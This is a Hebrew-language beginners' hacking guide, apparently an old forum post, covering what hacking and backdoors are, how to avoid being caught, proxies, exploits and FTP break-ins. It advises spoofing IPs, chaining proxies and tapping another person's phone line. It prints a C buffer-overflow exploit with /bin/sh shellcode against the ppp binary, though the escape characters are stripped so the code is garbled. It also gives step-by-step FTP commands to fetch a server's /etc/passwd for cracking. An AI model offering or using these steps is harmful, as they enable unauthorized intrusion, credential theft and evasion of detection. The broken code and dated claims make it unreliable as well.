המדריך הכללי להאקינג (מתחילים)
מה במדריך זה:
* מה זה פריצה? ולמה ?
* איך להיזהר בזמן הפריצה?
* Proxy
* מה זה אקספלויט?
* דוגמא של אקספלויט מעולה.
* הסבר על פריצה אתרי אף.טי.פי והוצאת קובץ סיסמאות.
* מאגרי מידע מומלצים.
====================
מה זה פריצה ? ולמה ?
====================
פריצה בעברית נכונה היא כניסה/לגנוב גישה למקום שאין לך גישה לשם.
להיכנס למקום/אזור/מערכת/רשת שאתה לא מורשה להיות שם,
אבל אתה בכל זאת אתה נכנס ע"י פריצה למקום/אזור/מערכת/רשת.
פריצה היא לא חוקית גם במחשבים וגם בחיים האמיתיים, ויש מדינות שעושות סיפור ממש גדול מזה.
למשל בישראל אתה לא כל כך חוטף על הראש עם תופסים אותך אבל אם בבריטניה אתה נתפס,
אתה מקבל עונש כמו טרוריסט, למרות שכולם יודעים שזה לא אותו דבר אבל ככה הם ה"חיים".
פריצה בכלליות היא חילול הקוד שמנהל מקום/אזור/מערכת/רשת קבע ואף לפעמים שינוי הקוד.
באקוודור הוא נושא אהוב על האקרים והוא משמש ועוזר להאקר לחדור למקום/אזור/מערכת/רשת.
שורות קוד שמישהו הכניס במכוון כדי לאפשר לעצמו (בד"כ) גישה למשהו על מחשב אחר יותר בקלות..
לדוגמא קוד שיפתח פורט מסוים רק לאי פי מסוים וייתן לו לכתוב שם פקודות קבועות שיבצעו
פעולה כלשהי לפי מה שמכין הבאקדור קבע.
לפעמים האקרים אשר מצאו את הבאקדור מנצלים את זה ומכינים כמה נוספים
כדי שהפריצה הבאה למערכת תהיה פשוטה יותר.
למה פורצים אתם רוצים לדעת ?
אני חושב שיש שתי קטגוריות לרצון של אנשים לפרוץ.
*רק שתדעו שהוטבורד הוא הפורום הכי חם ברשת!
א. האקר "טוב" - האקר טוב לא יפרוץ למקום/אזור/מערכת/רשת כדי להרוס או לשים את החותמת שלו,
לשים את השם שלו ולצפות שיראו בחדשות שהוא פרץ וצריך לפחד ממנו וכו', הוא לא יפרוץ בשביל מטרה רעה.
הוא יפרוץ, אם בכלל למקום/אזור/מערכת/רשת כדי להראות למנהל הרשת שיש לו בעיה איפה שהו.
ישאיר חותמת ולא ימחק את הלוגים או יהרוס משהו. המטרה שלו היא לעשות טוב !!!
ה זה מתחלק לשני חלקים:
1. מנהל הרשת יודה להאקר שהודיע לו על הבעיה ואף אולי יצ'פר אותו איכשהו.
2. מנהל הרשת לא יקבל את כטובה וידווח עליו לרשויות ומשם זה מתפצל לעוד שני חלקים (תסתכלו יותר למטה).
*רק שתדעו שהוטבורד הוא הפורום הכי חם ברשת!
ב. האקר "רע" - הוא ההפך המושלם (או שלא) מההאקר הטוב, הוא יפרוץ למקום/אזור/מערכת/רשת כדי,
להשליט טרור (קצת מוגזם) ולהרוס את מה שהוא הגיע אליו.
הוא ישאיר חותמת שהוא הרס את זה בגלל שבלה בלה, ובלה בלה.
קרוב לוודאי שהוא יהרוס את כל הקבצים במערכת וימחק את הלוגים (LOGS).
הוא לא יעשה שום דבר טוב אלא רק יעשה את זממו, שהוא דבר רע.
מפה העניין מתפצל לשני חלקים.
1. יתפסו אותו , יקנסו אותו, יהיה משפט, הוא יקבל עונש, לא יגע במחשב 20 שנה וימות מזקנה.
2. לא יתפסו אותו, לא יקנסו אותו, לא יהיה משפט, הוא לא יענש, הוא יהרוס עוד אתר ומשם זה ממשיך.
אולי יתפסו ואולי לא. העונש על פריצה הוא תמיד כבד , אבל יש מדינות שהוא יותר מדי כבר.
תודה ל-
*רק שתדעו שהוטבורד הוא הפורום הכי חם ברשת!
========================
איך להיזהר בזמן הפריצה ?
========================
קודם כל הכי חשוב, בכלל לא כדאי לפר וץ אלא אם אתם בטוחים שאתם יודעים איך להיזהר.
הנה פה כמה שיטות נחמדות להגן על עצמכם.
יש כאלה אנשים שאומרים לא לפרוץ מהבית, ויש כאלה שאומרים לחייג *43 שלא יאתרו מאיפה אתה מתקשר.
כל אלה נכונים במקצת.
& לידע אישי, *43 לא חוסם את השיחה אלא מונע *42. במכשירי שיחה מזוהה רגילים זה מונע את הצגת המספר,
אבל בחברות אינטרנט וכל מה שיש לו ציוד רציני זה ימנע *42 ולא יותר.
השיטה הכי טובה לא להיתפס, היא לא לעשות את זה אבל אם בכל מקרה אתם רוצים אז הנה:
נערך עקב פרסום פורום מתחרה~~
1. תנסו להסוות את האיפי / הוסט / סבנט מסק שלכם.
אם אתם יכולים אפילו את המספר טלפון שעליו אתם מתחברים לאינטרנט , לא דרך *43 אלא דרכים אחרות אם אתם מכירים.
2. תתחברו דרך כמה שיותר תחנות שידור כדי שיהיה קשה להגיע אליכם. (proxy וכו').
3. עשו ספופ ממש חזק לאיפי שלכם שגם עוד שנה לא יגיעו אליו.
4. תנסו לא לפרוץ מהבית כי זה באמת עוזר אבל זה תלוי, אם יש לכם מקום שאתם יכולים להיות שם הרבה זמן,
ולא יחדשו בכם או לא יגיעו אליכם לאחר המעשה, אז לכו על זה.
5. כמו כן השיטה לדעתי הכי טובה, היא להתחבר לקו טלפון של מישהו ומשם להתחבר לאינטרנט ולעשות את זממכם.
======
Proxy.
======
שרת המוקם על ידי ספקי שירות (חברות אינטרנט, חברות גדולות וכו') למען לקוחותיו ותפקידו ליצור
קשר עם מחשבים ברשת ולשלוף מהם מידע על פי בקשת הגולשים. לשרת הפרוקסי חיבור מהיר הרבה יותר
משל הגולש הממוצע עם המודם ולכן משמש כמקום מהיר בהרבה לקבלת קבצים ממנו.
אם הרבה אנשים מבקשים את אותו קובץ - הקובץ נשמר בשרת הפרוקסי, ובכך חוסך לגולשים את ההמתנה
לקבלת המידע משרת האינטרנט המרוחק. על שרתי פרוקסי יש גם הגנה ולכן הם יכולים לשמש כפיירוול.
ככה כל העניין הזה עובד:
|---------| |-------| |-------|
|PC-MODEM | -----> | PROXY | -----> | SITE |
|---------| |-------| |-------|
================
מה זה אקספלויט ?
================
אקספלויט בפרוש האמיתי הוא חור אבטחה שניתן לנצל לטובתנו (האקרים).
אבל בשפה של היום, איך שהאקרים אומרים את זה, האקספלויט בעצם הוא
ניצול של חורי אבטחה - קודים/דרכים/טכניקות לנצל חורי אבטחה במקום/אזור/מערכת/רשת.
איך אפשר לנצל חור אבטחה, פשוט קודם צריך למצוא חור, איך עושים את זה ?
יש כמה דרכים, עושים סריקה כללית למקום/אזור/מערכת/רשת או רק סריקה של אבטחה במקום/אזור/מערכת/רשת.
אם תעשו סריקה כללית זה ייקח יותר זמן,
אבל כל מה שתמצאו בפנים (בזמן הסריקה) יכול לעזור יותר ממה שתמצאו רק בסריקה של האבטחה.
אתם מוצאים חור, כנסו לאתר שמסביר ממש טוב על אקספלויטים וחפשו איך לנצל אותו.
תוכלו למצוא רשימה של אתרים למטה, במאגרי המידע המומלצים.
========================
דוגמא של אקספלויט מעולה.
========================
כפי שאתם יודעים יש אקספלויטים שצריך לקמפל (compile), מה הכוונה.
האקספלויט יהיה כתוב בשפת תכנות כלשהי (++pascal, vb, c וכו').
אז קימפול הופך את הקובץ לשפה בינארית (0,1) , שפת מחשב, השפה היחידה שהמחשב יבין.
Create a new file and write in it: (save it as *.c)
-------From here----------
#Include
#Include
#Include
#Define BUFFER_SIZE 156 /* size of the bufer to overflow */
#Define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eaxn"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
"x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
"x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
"x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04"; /*סה"כ 57 בייטים בשימוש*/
int i,j;
buf = malloc(4096);
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell;
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
-------end-------------
לאחר מכן אתם צריכים לקמפל את הקובץ שהרגע כתבנו.
מה זה בכלל ? האקספלויט הנחמד הזה הוא בעצם סקריפט בשביל ה-ppp vulnerbility.
פריצה של פרוטוקול תקשורת לאינטרנט (Point To Point Protocol).
זה קרוב לוודאי מייצר ארורים בתוך בסרבר (פרוטוקול) וגורם לפעמים לקריסתו.
&& אל תתעסקו אם המספרים כי אחרת זה לא יעבוד !!!
*רק שתדעו שהוטבורד הוא הפורום הכי חם ברשת!
================================================
הסבר על פריצה אתרי אף.טי.פי והוצאת קובץ סיסמאות.
================================================
מהו בעצם אף.טי.פי (FTP) ?
FTP - File Transport Protocol, הוא פרוטוקול אשר משמש אותנו ואת אחרים להעברת קבצים באינטרנט.
כדי לגשת לאתר אף.טי.פי של מישהו צריך שם משתמש וסיסמא, אפשר גם להיכנס כאנונימי , אורח.
אבל אם אתה נכנס כאורח קרוב לוודאי שתמיד תוכל רק לצפות שמה שיש וכל מה שיש באתר,
הופך להיות למצב "קריאה בלבד". אי אפשר להוריד את זה למחשבך האישי.
עכשיו יש לכם פה הסבר על פריצה לאתר אף.טי.פי והוצאת קובץ הסיסמאות של האתר, ואז,
אפשר לגשת לאתר אף.טי.פי ללא ידיעתו של האדמין כי הוא לא יודע שיש לך את הסיסמא.
אוקי הנה השיטה רק, תזהרו במה שאתם עושים אם זה.
-------start------
1. לכו ותפתחו לכם חלון דוס, פרומט דוס (Dos Promt).
2. הקישו את הרצף הבא:
Ftp ftp.server-to-hack.com
3. עכשיו אתה אמורים להקיש שם משתמש, נכון ? אל תקישו כלום, לחצו על אנטר (Enter).
4. עכשיו אתה אמורים להקיש סיסמא, נכון ? אל תקישו כלום, לחצו על אנטר (Enter).
5. הקישו את הרצף הבא: quote user ftp.
6. עכשיו את זה: quote cwd ~root.
7. ועכשיו את זה: quote pass ftp. (בלי הנקודה ובלי הנקודתיים).
8. עכשיו אתם מחוברים, הקישו את זה : cd etc.
9. עכשיו אתם בתיקיה etc, הקישו : get passwd.
--------end-------
אם עשיתם הכול נכון אז הקובץ של הסיסמאות אמור לרדת לכונן הקשיח שלכם ומשם אתם לבד.
אם הוא מוצפן בדרך כלשהי, נסו לעשות אם זה משהו,
תחשבו אלי איך לפצח אותו או תורידו תוכנות שתעשה את זה (לא חסר תוכנות כאלה).
ואם הקובץ לא מוצפן אז זה חסך לכם עבודה ! ועבודה רבה !
משם תעשו מה שאתם רוצים אם מה שאתם מוצאים.
כל מה שאתם מקישים, הקישו בלי הנקודה ובלי הנקודתיים.
הערה חשובה !!!! זה לא יעבוד על כל האתרים וכל כל המערכות.
